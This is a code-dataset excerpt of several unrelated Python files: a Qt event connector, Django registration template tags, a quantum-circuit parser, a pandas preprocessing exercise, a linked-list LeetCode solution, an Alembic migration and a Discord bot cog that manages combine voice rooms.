object.\"\"\"\n\t\treturn self._categories\n\n\tdef addCategory(self, c):\n\t\t\"\"\"Add a category to the object.\"\"\"\n\t\tif c in self._categories:\n\t\t\treturn\n\t\tself._categories.add(c)\n\t\tCONNECTOR.addCategory(self, c)\n\n\tdef removeCategory(self, c):\n\t\t\"\"\"Remove a category from an object.\"\"\"\n\t\tif c not in self._categories:\n\t\t\treturn\n\t\tself._categories.remove(c)\n\t\tCONNECTOR.removeCategory(self, c)\n\n\ndef peekSet(s):\n\treturn next(iter(s))\n\n\ndef isAncestorOf(ancestor, child):\n\t\"\"\"Return True if `ancestor` is an ancestor of `child`, QObject-tree-wise.\"\"\"\n\twhile child is not None:\n\t\tif child is ancestor:\n\t\t\treturn True\n\t\tchild = child.parent()\n\treturn False\n\n\ndef categoryObjects(categories, ancestor=None):\n\t\"\"\"Return objects matching all specified categories.\n\n\t:param categories: matching object should match _all_ these categories\n\t:type categories: list or str\n\t:param ancestor: if not None, only objects that are children of `ancestor` are returned\n\t\"\"\"\n\tif ancestor is None:\n\t\treturn CONNECTOR.objectsMatching(categories)\n\telse:\n\t\treturn [obj for obj in CONNECTOR.objectsMatching(categories) if isAncestorOf(ancestor, obj)]\n\n\ndef deleteCreatedBy(caller):\n\t\"\"\"Unregister listeners registered by script `caller`.\n\n\tIf `caller` script file had registered any listeners (as with :any:`registerSignal`), this method\n\tunregisters them.\n\n\tThis can be useful to unregister all listeners from a script to re-run the script afterwards, to\n\tavoid listeners be registered (and listening) twice.\n\n\t:param caller: path of the script that registered listeners\n\t:type caller: str\n\t\"\"\"\n\tCONNECTOR.deleteCreatedBy(caller)\n\n\ndef registerSignal(categories, signal, stackoffset=0):\n\t\"\"\"Decorate a function that should be run when a signal is emitted.\n\n\tWhen the `signal` of all existing and future objects matching all specified `categories`\n\tis emitted, the decorated function will be called.\n\n\tWhen called, the decorated function will received the target object as first argument, then\n\tthe signal arguments as next arguments.\n\n\t:param categories: the categories to match\n\t:type categories: list or str\n\n\tExample::\n\n\t\t@registerSignal('editor', 'fileSaved')\n\t\tdef foo(editor_obj, path):\n\t\t\tprint('file %s has been saved', path)\n\t\"\"\"\n\n\tcategories = frozenset(to_stringlist(categories))\n\tdoctext = ('This handler is registered for categories ``%s`` on signal ``%s``.'\n\t\t\t\t % (list(categories), signal))\n\n\tif BUILDING_DOCS:\n\t\treturn lambda x: _addDoc(x, doctext)\n\n\tdef deco(func):\n\t\tcaller = inspect.stack()[1 + stackoffset][1]\n\n\t\tlis = SignalListener(func, categories, signal, CONNECTOR)\n\t\tlis.caller = caller\n\t\tCONNECTOR.addListener(categories, lis)\n\n\t\t_addDoc(func, doctext)\n\n\t\treturn func\n\n\treturn deco\n\n\ndef registerSetup(categories, stackoffset=0):\n\t\"\"\"Decorate a function that should be run for all objects matching categories.\n\n\tWhen an object is created that matches `categories` or an object is being added new categories and they match\n\tthe specified `categories`, the decorated function will be called.\n\tAlso, when the function is decorated, it is called for all existing objects matching `categories`.\n\n\tThe decorated function will received the matching object as only argument.\n\n\t:param categories: the categories to match\n\t:type categories: list or str\n\n\tExample::\n\n\t\t@registerSetup('editor')\n\t\tdef foo(editor_obj):\n\t\t\tprint('an editor has been created')\n\t\"\"\"\n\n\tcategories = frozenset(to_stringlist(categories))\n\tdoctext = 'This handler is registered as setup for categories ``%s``.' % (list(categories),)\n\n\tif BUILDING_DOCS:\n\t\treturn lambda x: _addDoc(x, doctext)\n\n\tdef deco(func):\n\t\tcaller = inspect.stack()[1 + stackoffset][1]\n\n\t\tlis = SetupListener(func, categories)\n\t\tlis.caller = caller\n\t\tCONNECTOR.addListener(categories, lis)\n\n\t\t_addDoc(func, doctext)\n\n\t\treturn func\n\n\treturn deco\n\n\ndef registerTeardown(categories, stackoffset=0):\n\tcategories = frozenset(to_stringlist(categories))\n\tdoctext = 'This handler is registered as teardown for categories ``%s``.' % (list(categories),)\n\n\tif BUILDING_DOCS:\n\t\treturn lambda x: _addDoc(x, doctext)\n\n\tdef deco(func):\n\t\tcaller = inspect.stack()[1 + stackoffset][1]\n\n\t\tlis = TearListener(func, categories)\n\t\tlis.caller = caller\n\t\tCONNECTOR.addListener(categories, lis)\n\n\t\t_addDoc(func, doctext)\n\n\t\treturn func\n\n\treturn deco\n\n\n\ndef registerEventFilter(categories, eventTypes, stackoffset=0):\n\t\"\"\"Decorate a function that should be run when an event is sent to an object.\n\n\tWhen a :any:`PyQt5.QtCore.QEvent` object of a type in `eventTypes` is sent to an object\n\tmatching `categories`, the decorated function will be called.\n\n\tThe decorated function must take 2 parameters: the destination object to which the event\n\tis sent and the event itself.\n\n\tIf the value returned by the decorated function is True, the sent event will be filtered:\n\tit will not reach the destination object, and it will not be processed by any other\n\tevent-filters, registered by standard Qt functions or by :any:`registerEventFilter`.\n\n\tIf the value returned by the decorated function is False or is omitted (it is None then),\n\tthe event will continue its route through other event-filters and to the destination\n\tobject.\n\n\tSee also :any:`PyQt5.QtCore.QObject.eventFilter` and\n\t:any:`PyQt5.QtCore.QObject.installEventFilter`.\n\n\tExample::\n\n\t\t@registerEventFilter('window', [QEvent.Close])\n\t\tdef onWinClose(window, event):\n\t\t\tprint('the %s window was closed' % window)\n\n\t:param categories: the categories to match\n\t:type categories: list or str\n\t:param eventTypes: list of accepted ``QEvent.type()`` the sent event should match\n\t:type eventTypes: list of ints\n\t:rtype: bool\n\t\"\"\"\n\n\tcategories = frozenset(to_stringlist(categories))\n\tdoctext = ('This handler is registered as event filter for categories ``%s`` with '\n\t\t\t 'event types ``%r``.' % (list(categories), eventTypes))\n\n\tif BUILDING_DOCS:\n\t\treturn lambda x: _addDoc(x, doctext)\n\n\tdef deco(func):\n\t\tcaller = inspect.stack()[1 + stackoffset][1]\n\n\t\tlis = EventFilter(func, categories, eventTypes, CONNECTOR)\n\t\tlis.caller = caller\n\t\tCONNECTOR.addListener(categories, lis)\n\n\t\t# TODO use textual event type (parse source)\n\t\t_addDoc(func, doctext)\n\n\t\treturn func\n\n\treturn deco\n\n\ndef disabled(func):\n\t\"\"\"Disable a function previously decorated with a listener like registerSignal.\n\n\tIf the decorated function (`func`) has been decorated with :any:`registerSignal`,\n\t:any:`registerEventFilter` or some other kind of listener decorator, the decorated function\n\twill not be called anymore when a matching signal is emitted or a event has to pass in a\n\tfilter, until it is enabled again.\n\n\tThis decorator simply sets an ``enabled`` attribute on the decorated function to False.\n\tTo re-enable the disabled function, just set the ``enabled`` attribute to True.\n\n\tWhen the function is re-enabled, missed signals and events will not cause the decorated\n\tfunction to be called, but upcoming signals/events will trigger the decorated function.\n\n\tSince functions decorated with :any:`registerSetup` can be triggered only when an object\n\t_starts_ matching categories, re-enabling such a function will not catch-up the setup of\n\tan object.\n\t\"\"\"\n\tfunc.enabled = False\n\n\tdoctext = 'This handler is disabled by default.'\n\t_addDoc(func, doctext)\n\n\treturn func\n\n\ndefaultEditorConfig = registerSetup('editor')\n\n\"\"\"Decorate a function that should be called for every editor.\n\nThis decorator is intended for functions to configure editor widgets.\nSee also :any:`registerSetup`.\n\"\"\"\n\ndefaultWindowConfig = registerSetup('window')\n\n\"\"\"Decorate a function that should be called for every EYE window.\n\nThis decorator is intended for functions to configure EYE windows.\nSee also :any:`registerSetup`.\n\"\"\"\n\ndefaultLexerConfig = registerSignal(['editor'], 'lexerChanged')\n\n\"\"\"Decorate a function that should be called when a lexer is set for an editor.\n\nThis decorator is intended for functions to configure lexers.\n\"\"\"\n\nCONNECTOR = EventConnector()\n","sub_path":"eye/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":15197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"120434378","text":"from registrasion.models import commerce\nfrom registrasion.controllers.category import CategoryController\nfrom registrasion.controllers.item import ItemController\n\nfrom django import template\nfrom django.db.models import Sum\nfrom urllib import urlencode\n\nregister = template.Library()\n\n\ndef user_for_context(context):\n ''' Returns either context.user or context.request.user if the former is\n not defined. '''\n try:\n return context[\"user\"]\n except KeyError:\n return context.request.user\n\n\n@register.assignment_tag(takes_context=True)\ndef available_categories(context):\n ''' Gets all of the currently available products.\n\n Returns:\n [models.inventory.Category, ...]: A list of all of the categories that\n have Products that the current user can reserve.\n\n '''\n return CategoryController.available_categories(user_for_context(context))\n\n\n@register.assignment_tag(takes_context=True)\ndef missing_categories(context):\n ''' Adds the categories that the user does not currently have. '''\n user = user_for_context(context)\n categories_available = set(CategoryController.available_categories(user))\n items = ItemController(user).items_pending_or_purchased()\n\n categories_held = set()\n\n for product, quantity in items:\n categories_held.add(product.category)\n\n return categories_available - categories_held\n\n\n@register.assignment_tag(takes_context=True)\ndef available_credit(context):\n ''' Calculates the sum of unclaimed credit from this user's credit notes.\n\n Returns:\n Decimal: the sum of the values of unclaimed credit notes for the\n current user.\n\n '''\n\n notes = commerce.CreditNote.unclaimed().filter(\n invoice__user=user_for_context(context),\n )\n ret = notes.values(\"amount\").aggregate(Sum(\"amount\"))[\"amount__sum\"] or 0\n return 0 - ret\n\n\n@register.assignment_tag(takes_context=True)\ndef invoices(context):\n '''\n\n Returns:\n [models.commerce.Invoice, ...]: All of the current user's invoices. '''\n return commerce.Invoice.objects.filter(user=user_for_context(context))\n\n\n@register.assignment_tag(takes_context=True)\ndef items_pending(context):\n ''' Gets all of the items that the user from this context has reserved.\n\n The user will be either `context.user`, and `context.request.user` if\n the former is not defined.\n '''\n\n return ItemController(user_for_context(context)).items_pending()\n\n\n@register.assignment_tag(takes_context=True)\ndef items_purchased(context, category=None):\n ''' Returns the items purchased for this user.\n\n The user will be either `context.user`, and `context.request.user` if\n the former is not defined.\n '''\n\n return ItemController(user_for_context(context)).items_purchased(\n category=category\n )\n\n\n@register.assignment_tag(takes_context=True)\ndef total_items_purchased(context, category=None):\n ''' Returns the number of items purchased for this user (sum of quantities).\n\n The user will be either `context.user`, and `context.request.user` if\n the former is not defined.\n '''\n\n return sum(i.quantity for i in items_purchased(context, category))\n\n\n@register.assignment_tag(takes_context=True)\ndef report_as_csv(context, section):\n\n old_query = context.request.META[\"QUERY_STRING\"]\n query = dict([(\"section\", section), (\"content_type\", \"text/csv\")])\n querystring = urlencode(query)\n\n if old_query:\n querystring = old_query + \"&\" + querystring\n\n return context.request.path + \"?\" + querystring\n","sub_path":"registrasion/templatetags/registrasion_tags.py","file_name":"registrasion_tags.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"483361268","text":"# parser.py\n# Nov 30 2010\n# Yu Tomita (yu.t@gatech.edu)\n#\n# Creates a list of operation objects from an input file.\n\nimport re\nfrom messObj import Qubit,Operation\n\ndef read_file(filename,initial_value_file=None):\n\tf = open(filename)\n\tqubits_dic = {}\n\toperations = []\n\tfor one in f:\n\t\tline = one.split()\n\t\tif len(line)<2:\n\t\t\tcontinue\n\t\ttry:\n\t\t\tgate = line[0]\n\t\t\tqubs = line[1].split(',')\n\t\t\ttime = int(re.findall('[0-9]+',line[-1])[0])\n\t\t\tqubits = []\n\t\t\tfor q in qubs:\n\t\t\t\tif q not in qubits_dic:\n\t\t\t\t\tqubits_dic[q] = Qubit(label=q)\n\t\t\t\tqubits.append(qubits_dic[q])\n\t\t\toperations.append(Operation(gate[0],qubits,False))\n\t\texcept (ValueError,TypeError,IndexError):\n\t\t\tem = 'Error: could not understand the line\\n'\n\t\t\tem+= ' line #%d->'%(len(listOpr)+1), one,'\\n'\n\t\t\traise SystemExit(em)\n\t\t\t\n\t# list of qubits sorted by labels\n\tqubits = [qubits_dic[a] for a in sorted(qubits_dic)]\n\treturn (qubits,operations)\n\ndef replace_ent(operations):\n\tsize = len(operations)\n\tfor i in range(size-1,-1,-1):\n\t\topr = operations[i]\n\t\tif opr.gate[0]=='E':\n\t\t\toperations.pop(i)\n\t\t\tnewOprs = [Operation('H',[opr.qubits[0]],opr.error),\n\t\t\t\t \tOperation('C_elu',opr.qubits[:],opr.error),\n\t\t\t\t\tOperation('X',[opr.qubits[0]],opr.error)]\n\t\t\tfor n in newOprs[::-1]:\n\t\t\t\toperations.insert(i,n)\n","sub_path":"mess/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"281249934","text":"# -*- coding: utf-8 -*-\ndef preprocessing(data):\n \"\"\"对data进行预处理\n 参数:\n data - pandas.dataframe格式,原始数据\n\n 返回值:\n processed_data - 预处理后的数据\n \"\"\"\n processed_data = data\n # 请在此添加实现代码 #\n #********** Begin *********#\n # print(data)\n # 删除拥有缺失值的行\n processed_data.dropna(axis=0,how='any',inplace=True)\n # 删除重复的数据\n #for column in data.columns:\n # column_data = data[column] # 某列的数据\n # 对该列进行缺失值删除\n # for i in range(len(column_data)):\n # if column_data[i] is None:\n # 删除该index 对应的行\n # processed_data.drop(processed_data.index[i],inplace=True)\n # 处理Sector_score字段 最大值为 最小值为\n min = data['Sector_score'].min\n max = data['Sector_score'].max\n #print('最小值',min)\n # print('最大值',max)\n # 处理Location_id 将字符串的行删除\n print(len(processed_data))\n location_id = processed_data['LOCATION_ID'] # 字段值\n id_len = len(location_id) # 字段长度\n print('location_id长度',id_len)\n for i in range(id_len):\n if location_id[i].isalpha():\n print('索引',i) \n #\n # Detection_Risk字段都是0.5唯一值,不具有分析价值,删除掉\n del processed_data['Detection_Risk']\n \n #********** End ***********#\n return processed_data","sub_path":"Train2/preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64345532","text":"\"\"\"\nhttps://leetcode.com/problems/reverse-nodes-in-k-group/\n\nGiven a linked list, reverse the nodes of a linked list k at a time and return its modified list.\n\nIf the number of nodes is not a multiple of k then left-out nodes in the end should remain as it is.\n\nYou may not alter the values in the nodes, only nodes itself may be changed.\n\nOnly constant memory is allowed.\n\nFor example,\nGiven this linked list: 1->2->3->4->5\n\nFor k = 2, you should return: 2->1->4->3->5\n\nFor k = 3, you should return: 3->2->1->4->5\n\"\"\"\n\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass SolutionLong(object):\n\n # Return kth node from start\n def findKth(self, start, k):\n if not start:\n return None\n\n # assumes k > 0\n kth = start\n for _ in xrange(k-1):\n if kth.next:\n kth = kth.next\n else:\n return None\n return kth\n\n def reverse(self, start, end):\n # assumes start != end\n prev, curr = start, start.next\n\n while True:\n next_ = curr.next\n curr.next = prev\n if curr == end:\n break\n prev, curr = curr, next_\n\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n if k < 2:\n return head\n\n curr, new_head, trail = head, None, None\n\n while True:\n kth = self.findKth(curr, k)\n if not kth:\n break\n\n next_ = kth.next # next_ symbolizes the start of the next segment to possibly reverse\n self.reverse(curr, kth)\n if not new_head:\n new_head = kth\n\n curr.next = next_ # in case the next segment doesn't need to be reversed\n if trail:\n # e.g. 1 2 3 4, k = 2\n # link 1 to 4 between 2->1 and 4->3\n trail.next = kth\n trail = curr\n curr = next_\n\n if not new_head:\n return head\n\n return new_head\n","sub_path":"lc/reverse_nodes_k_group.py","file_name":"reverse_nodes_k_group.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"135623052","text":"\"\"\"add onlines table\n\nRevision ID: d254e891c7fc\nRevises: 40c9abe1bafb\nCreate Date: 2016-12-18 09:26:38.937172\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd254e891c7fc'\ndown_revision = '40c9abe1bafb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('onlines',\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('sid', sa.String(length=128), nullable=False),\n sa.Column('lastactive', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('user_id', 'sid')\n )\n op.create_index(op.f('ix_onlines_sid'), 'onlines', ['sid'], unique=False)\n op.create_index(op.f('ix_onlines_user_id'), 'onlines', ['user_id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_onlines_user_id'), table_name='onlines')\n op.drop_index(op.f('ix_onlines_sid'), table_name='onlines')\n op.drop_table('onlines')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/d254e891c7fc_add_onlines_table.py","file_name":"d254e891c7fc_add_onlines_table.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385144108","text":"import discord\nfrom redbot.core import Config\nfrom redbot.core import commands\nfrom redbot.core import checks\n\n# TODO:\n# - custom combines_info message\ndefaults = {\"players_per_room\": 6, \"room_capacity\": 10, \"combines_category\": None, \"public_combines\": True, \"acronym\": \"RSC\"}\n\n\nclass CombineRooms(commands.Cog):\n def __init__(self, bot):\n self.config = Config.get_conf(self, identifier=1234567892, force_registration=True)\n self.config.register_guild(**defaults)\n self.team_manager_cog = bot.get_cog(\"TeamManager\")\n\n @commands.command(aliases=[\"startcombines\", \"stopcombines\"])\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def combines(self, ctx, *keywords):\n \"\"\"\n Creates rooms for combines, or tears them down depending on the action parameter. If no parameter is given, it will behave as a switch.\n \n Examples:\n [p]combines\n [p]combines start\n [p]combines stop\n \"\"\"\n keywords = set(keywords)\n # is_public = not bool(keywords & set([\"private\"]))\n\n if bool(keywords & set([\"start\", \"create\"])):\n done = await self._start_combines(ctx)\n elif bool(keywords & set([\"start\", \"create\"])):\n done = await self._stop_combines(ctx)\n else:\n combines_ongoing = await self._combines_category(ctx.guild)\n if combines_ongoing:\n done = await self._stop_combines(ctx)\n else:\n done = await self._start_combines(ctx)\n if done:\n await ctx.send(\"Done\")\n return\n \n @commands.command(aliases=[\"sppr\"])\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def setPlayersPerRoom(self, ctx, size: int):\n \"\"\"\n Sets the recommended amount of concurrent players in combine rooms. (Default: 6)\n \"\"\"\n\n if size < 2:\n await ctx.send(\":x: There is a minimum of 2 players per voice channel.\")\n return False \n combines_cat = await self._save_players_per_room(ctx.guild, size)\n # DISABLED: room size in name\n # if combines_cat and False:\n # for vc in combines_cat.voice_channels:\n # await self._adjust_room_(guild, vc)\n await ctx.send(\"Done\")\n return True\n \n @commands.command(aliases=[\"ppr\"])\n @commands.guild_only()\n async def getPlayersPerRoom(self, ctx):\n \"\"\"\n Gets the recommended amount of concurrent players in combine rooms.\n \"\"\"\n size = await self._players_per_room(ctx.guild)\n await ctx.send(\"Combines should have no more than {0} active players in them.\".format(size))\n\n @commands.command(aliases=[\"setroomcap\", \"src\"])\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def setRoomCapacity(self, ctx, size: int):\n \"\"\"\n Sets the maximum number of members allowed in combine voice channels. (Default: 10)\n \"\"\"\n if size < 2:\n await ctx.send(\":x: There is a minimum of 2 players per voice channel.\")\n return False \n combines_cat = await self._save_room_capacity(ctx.guild, size)\n if self._combines_category(ctx.guild):\n await ctx.send(\"Done: Changes will not be applied to rooms that are already up.\")\n else:\n await ctx.send(\"Done\")\n return True\n\n @commands.command(aliases=[\"roomcap\", \"grc\"])\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def getRoomCapacity(self, ctx):\n \"\"\"\n Gets the current capacity of combine voice rooms (Default: 10)\n This capacity is for all members, players and scouts combined.\n \"\"\"\n cap = await self._room_capacity(ctx.guild)\n await ctx.send(\"Combines currently have a maximum size of {0} members.\".format(cap))\n return\n\n @commands.command(aliases=[\"togglePub\", \"toggleCombines\", \"togglePublicCombine\", \"tpc\", \"toggleCombinePermissions\", \"tcp\"])\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def togglePublicity(self, ctx):\n \"\"\"\n Toggles the status (public/private) of the combines. (Default: Public)\n If combines are **Public**, any member may participate.\n If combines are **Private**, only members with the \"League\" role may particpate.\n \"\"\"\n is_public = await self._toggle_public_combine(ctx.guild)\n await self._update_combine_permissions(ctx.guild)\n\n public_str = \"public\" if is_public else \"private\"\n response = \"Combines are now **{0}**.\".format(public_str)\n await ctx.send(response)\n\n @commands.command(aliases=[\"checkCombinePublicity\", \"ccp\", \"combineStatus\", \"checkCombineStatus\", \"ccs\"])\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def combinePublicity(self, ctx):\n \"\"\"\n Gets the current status (public/private) of the combines.\n If combines are **Public**, any member may participate.\n If combines are **Private**, only members with the \"League\" role may particpate.\n \"\"\"\n public_str = \"public\" if await self._is_public_combine(ctx.guild) else \"private\"\n response = \"Combines are currently **{0}**.\".format(public_str)\n await ctx.send(response)\n\n @commands.command(aliases=[\"getAcronym\"])\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def acronym(self, ctx):\n \"\"\"\n Gets the acronym registered for combines. (Default: RSC)\n \"\"\"\n acronym = await self._get_acronym(ctx.guild)\n await ctx.send(\"The acronym registered for the combines cog is **{0}**.\".format(acronym))\n\n @commands.command()\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def setAcronym(self, ctx, new_acronym: str):\n \"\"\"\n Sets the server acronym used in the combines category. (Default: RSC)\n This is mostly used in #combine-details message\n \"\"\"\n await self._save_acronym(ctx.guild, new_acronym)\n await ctx.send(\"The acronym has been registered as **{0}**.\".format(new_acronym))\n\n @commands.Cog.listener(\"on_voice_state_update\")\n async def on_voice_state_update(self, member, before, after):\n combines_ongoing = await self._combines_category(member.guild)\n\n # ignore when combines are not ongoing, or when voice activity is within the same room\n if not combines_ongoing or before.channel == after.channel:\n return\n \n # Room joined:\n await self._member_joins_voice(member, after.channel)\n # Room left:\n await self._member_leaves_voice(member, before.channel) # TODO: consider disconnected case #@me what does that even mean? this structure should cover everything\n\n async def _start_combines(self, ctx):\n # Creates combines category and rooms for each tier\n combines_category = await self._add_combines_category(ctx, \"Combine Rooms\")\n await self._save_combine_category(ctx.guild, combines_category)\n\n if combines_category:\n await self._add_combines_info_channel(ctx.guild, combines_category, \"Combines Details\")\n for tier in await self.team_manager_cog.tiers(ctx):\n await self._add_combines_voice(ctx.guild, combines_category, tier)\n return True\n return False\n\n async def _stop_combines(self, ctx):\n # remove combines channels, category\n combines_category = await self._combines_category(ctx.guild)\n if combines_category:\n for channel in combines_category.channels:\n await channel.delete()\n await combines_category.delete()\n return True\n await ctx.send(\"could not find combine rooms.\")\n return False\n \n async def _update_combine_permissions(self, guild: discord.Guild):\n combines_category = await self._combines_category(guild)\n is_public = await self._is_public_combine(guild)\n\n if combines_category:\n league_role = self._get_role_by_name(guild, \"League\")\n overwrites = {\n guild.default_role: discord.PermissionOverwrite(view_channel=is_public, connect=is_public, send_messages=False),\n league_role: discord.PermissionOverwrite(view_channel=True, connect=True)\n }\n await combines_category.set_permissions(guild.default_role, view_channel=is_public, connect=is_public, send_messages=False)\n await combines_category.set_permissions(league_role, view_channel=True, connect=True, send_messages=False)\n \n async def _add_combines_category(self, ctx, name: str):\n category = await self._combines_category(ctx.guild)\n # check if category exists already\n if category:\n await ctx.send(\"A category with the name \\\"{0}\\\" already exists\".format(name))\n return None\n \n if not await self._is_public_combine(ctx.guild):\n league_role = self._get_role_by_name(ctx.guild, \"League\")\n overwrites = {\n ctx.guild.default_role: discord.PermissionOverwrite(view_channel=False, connect=False, send_messages=False),\n league_role: discord.PermissionOverwrite(view_channel=True, connect=True, send_messages=False)\n }\n else:\n overwrites=None\n\n category = await ctx.guild.create_category(name, overwrites=overwrites)\n return category\n\n async def _maybe_remove_combines_voice(self, guild: discord.Guild, voice_channel: discord.VoiceChannel):\n tier = self._get_voice_tier(voice_channel)\n category = await self._combines_category(guild)\n tier_voice_channels = []\n for vc in category.voice_channels:\n if tier in vc.name:\n tier_voice_channels.append(vc)\n \n # Never remove the last room for a tier\n if len(tier_voice_channels) == 1:\n return False\n\n # Always retain room 1 for tier:\n # await voice_channel.delete()\n i = voice_channel.name.index(\"room \") + 5\n # DISABLED: active players in room name\n # j = voice_channel.name.index(\" (\")\n room_num = int(voice_channel.name[i:]) # j])\n room_one_empty = (room_num == 1)\n\n # if voice_channel was not room 1\n if not room_one_empty:\n # No need to kick scouts. Let them hang out :)\n if voice_channel.members:\n return False\n await voice_channel.delete()\n return True\n \n # delete the other empty room (instead of room 1)\n for vc in tier_voice_channels:\n if not vc.members and vc != voice_channel:\n await vc.delete()\n return True\n\n async def _add_combines_info_channel(self, guild: discord.Guild, category: discord.CategoryChannel, name: str):\n overwrites = {\n guild.default_role: discord.PermissionOverwrite(send_messages=False)\n }\n tc = await category.create_text_channel(name, position=0, permissions_synced=True, overwrites=overwrites)\n\n acronym = await self._get_acronym(guild)\n info_message = (\n \"Welcome to the {0} combines! Combine rooms will be available to all players who are Free Agents or Draft Eligible. \"\n \"During combines, you are welcome to spend as much or as little time playing as you'd like. Your participation in combines \"\n \"gives franchise scouts an opportunity to see how you play. No pressure though! The primary goal for combines is to give \"\n \"everybody an opportunity to get introduced to gameplay at their respective tiers.\"\n\n \"\\n\\n__Server Information__\"\n \"\\nServers can be made by anybody in the combine room. We do ask that the lobbies are made with the following naming convention:\"\n \"\\n\\n**Lobby Info:**\"\n \"\\n - Name: ****\"\n \"\\n - Password: **{1}**\"\n \n \"\\n\\n**Example:**\"\n \"\\n - Voice Channel Name: **Challenger room 4**\"\n \"\\n - Name: **Challenger4**\"\n \"\\n - Password: **{1}4**\"\n\n \"\\n\\n__The Role of Scouts__\"\n \"\\n - For lack of a better phrase, scouts are \\\"in charge\\\" of running combines.\"\n \"\\n - If a scout requests a lineup, please respect this request.\"\n \"\\n - If a scout requests for mutator settings such as adjusted time length, or a goal limit, please respect this request.\"\n \"\\n - If you have concerns with how combines are being run, contact a mod or an admin.\"\n\n \"\\n\\n__Other Notes__\"\n \"\\n - Please try to curb your particpation in combines towards your own tier. Do not play outside of your tier without being requested \"\n \"by a scout, or asking permission of the other players in the combine room.\"\n \"\\n - Don't stress! All players have good and bad days. Scouts care more about _how you play_ than _how your perform_. If you have a \"\n \"rough game, or a bad night, you'll have plenty of opportunity to show your abilities in remaining combine games\"\n \"\\n - As per {2} rules, do not be toxic or hostile towards other players.\"\n \"\\n - GLHF!\"\n ).format(guild.name, acronym.lower(), acronym)\n await tc.send(info_message)\n \n async def _add_combines_voice(self, guild: discord.Guild, category: discord.CategoryChannel, tier: str):\n # user_limit of 0 means there's no limit\n # determine position with same name +1\n tier_rooms = []\n for vc in category.voice_channels:\n if tier in vc.name:\n tier_rooms.append(vc)\n\n room_makeable = False\n new_position = None\n new_room_number = 1\n while not room_makeable:\n room_makeable = True\n for vc in tier_rooms:\n i = vc.name.index(\"room \") + 5\n # DISABLED: room count in name\n # j = vc.name.index(\" (\")\n vc_room_num = int(vc.name[i:]) # j])\n if vc_room_num == new_room_number:\n new_room_number += 1\n new_position = vc.position\n room_makeable = False\n \n # DISABLED: room count in name\n # ppr = await self._players_per_room(guild)\n capacity = await self._room_capacity(guild)\n # room_name = \"{0} room {1} (0/{2})\".format(tier, new_room_number, ppr)\n room_name = \"{0} room {1}\".format(tier, new_room_number)\n\n if not new_position:\n await category.create_voice_channel(room_name, permissions_synced=True, user_limit=capacity)\n else:\n await category.create_voice_channel(room_name, permissions_synced=True, user_limit=capacity, position=new_position)\n\n async def _member_joins_voice(self, member: discord.Member, voice_channel: discord.VoiceChannel):\n combines_category = await self._combines_category(member.guild)\n if voice_channel in (await self._combines_category(member.guild)).voice_channels:\n player_count = await self._adjust_room_tally(member.guild, voice_channel)\n if player_count == 1:\n tier = self._get_voice_tier(voice_channel)\n await self._add_combines_voice(member.guild, combines_category, tier)\n \n async def _member_leaves_voice(self, member: discord.Member, voice_channel: discord.VoiceChannel):\n if voice_channel in (await self._combines_category(member.guild)).voice_channels:\n # DISABLED\n player_count = await self._adjust_room_tally(member.guild, voice_channel)\n if player_count == 0:\n await self._maybe_remove_combines_voice(member.guild, voice_channel)\n \n async def _get_category_by_name(self, guild: discord.Guild, name: str): \n for category in guild.categories:\n if category.name == name:\n return category\n return None\n \n # DISABLED :/ (currently only returns player count)\n async def _adjust_room_tally(self, guild: discord.Guild, voice_channel: discord.VoiceChannel):\n # possibility: only call this function when an active player triggers the call and/or make this an increment/decrement function\n fa_role = self._get_role_by_name(guild, \"Free Agent\")\n de_role = self._get_role_by_name(guild, \"Draft Eligible\")\n scout_role = self._get_role_by_name(guild, \"Combine Scout\")\n player_count = 0\n # max_size = await self._players_per_room(guild)\n for member in voice_channel.members:\n if not await self._is_public_combine(guild):\n active_player = (fa_role in member.roles or de_role in member.roles) and scout_role not in member.roles\n else:\n active_player = scout_role not in member.roles\n if active_player:\n player_count += 1\n \n # DISABLED: channel renaming\n # name_base = voice_channel.name[:voice_channel.name.index(\" (\")]\n # rename = \"{0} ({1}/{2})\".format(name_base, player_count, max_size)\n # await voice_channel.edit(name=rename)\n return player_count\n\n def _get_role_by_name(self, guild: discord.Guild, name: str):\n for role in guild.roles:\n if role.name == name:\n return role\n return None\n \n def _get_voice_tier(self, voice_channel: discord.VoiceChannel):\n return voice_channel.name.split()[0]\n\n async def _combines_category(self, guild: 